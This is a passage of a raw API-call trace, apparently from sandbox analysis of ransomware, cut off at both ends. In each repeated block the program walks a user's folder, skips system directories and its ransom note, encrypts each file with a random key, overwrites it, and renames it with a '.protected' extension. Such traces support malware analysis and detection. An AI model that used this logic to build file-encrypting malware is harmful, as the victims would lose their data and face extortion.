lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.801] CloseHandle (hObject=0x150) returned 1 [0085.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected") returned 101 [0085.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.protected")) returned 1 [0085.804] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files (x86)") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$Recycle.bin") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="System Volume Information") returned -1 [0085.804] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.804] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".protected") returned 0x0 [0085.804] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.804] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".rar") returned 0x0 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".zip") returned 0x0 [0085.805] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.806] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.807] SetFilePointerEx (in: hFile=0x150, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.807] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.807] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.807] CloseHandle (hObject=0x150) returned 1 [0085.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected") returned 110 [0085.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.protected")) returned 1 [0085.809] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files (x86)") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$Recycle.bin") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="System Volume Information") returned -1 [0085.809] 
wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".protected") returned 0x0 [0085.810] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".rar") returned 0x0 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".zip") returned 0x0 [0085.810] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesRead=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0085.818] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.818] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0085.819] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.819] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.819] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.819] CloseHandle (hObject=0x150) returned 1 [0085.820] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected") returned 108 [0085.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.protected")) returned 1 [0085.821] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files (x86)") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$Recycle.bin") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="System Volume Information") returned -1 [0085.821] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.821] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".protected") returned 0x0 [0085.821] lstrcmpW (lpString1="Soft Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.821] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.821] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] 
StrStrW (lpFirst="Soft Blue.htm", lpSrch=".rar") returned 0x0 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".zip") returned 0x0 [0085.822] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.823] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.823] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.824] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.824] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.824] CloseHandle (hObject=0x150) returned 1 [0085.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected") returned 105 [0085.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.protected")) returned 1 [0085.827] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files (x86)") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$Recycle.bin") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="System Volume Information") returned -1 [0085.827] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.827] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".protected") returned 0x0 [0085.827] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.827] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.827] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x150 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".rar") returned 0x0 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".zip") returned 0x0 [0085.830] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.878] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.878] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.879] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.879] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.879] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.879] CloseHandle (hObject=0x150) 
returned 1 [0085.880] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected") returned 104 [0085.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.protected")) returned 1 [0085.881] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files (x86)") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="$Recycle.bin") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="System Volume Information") returned -1 [0085.881] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.881] StrStrIW (lpFirst="Stars.htm", lpSrch=".protected") returned 0x0 [0085.881] lstrcmpW (lpString1="Stars.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.881] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.881] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 
1 [0085.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".rar") returned 0x0 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".zip") returned 0x0 [0085.883] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0085.884] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.886] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0085.887] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.887] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.887] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.887] CloseHandle (hObject=0x150) returned 1 [0085.887] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected") returned 101 [0085.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.protected")) returned 1 [0085.888] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.888] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0085.888] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files (x86)") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="$Recycle.bin") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="System Volume Information") returned -1 [0085.889] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrIW (lpFirst="Stars.jpg", lpSrch=".protected") returned 0x0 [0085.889] lstrcmpW (lpString1="Stars.jpg", 
